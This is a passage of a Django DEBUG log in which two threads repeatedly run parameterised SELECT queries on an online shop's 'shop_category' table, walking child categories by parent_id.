"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:38:25,807 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:38:25,809 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:38:25,812 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:38:25,814 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:38:25,816 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:38:25,818 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:38:25,820 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:38:25,823 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:38:25,826 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:38:25,828 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:38:25,830 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:38:25,832 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:38:25,834 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:38:25,837 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:38:25,839 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:38:25,842 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:38:25,844 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:38:25,848 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:38:25,851 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:38:25,853 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:38:25,855 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:38:25,857 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:38:25,859 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:38:25,861 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:38:25,863 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:38:25,865 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:38:25,867 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:38:25,869 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:38:25,871 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:38:25,875 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:38:25,878 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:38:25,880 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:38:25,882 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:38:25,884 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:38:25,886 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:38:25,888 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:38:25,890 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:38:25,892 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:38:25,894 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:38:25,899 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:38:25,902 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:38:25,904 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:38:25,906 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:38:25,908 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:38:25,910 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:38:25,912 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:38:25,914 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:38:25,916 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:38:25,918 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:38:25,923 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:38:25,927 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:38:25,930 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:38:25,932 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:38:25,935 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:38:25,937 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:38:25,940 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:38:25,942 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:38:25,944 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:38:25,946 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:38:25,948 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:38:25,951 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:38:25,953 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:38:25,956 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:38:25,958 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:38:25,960 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:38:25,962 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:38:25,964 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:38:25,967 utils 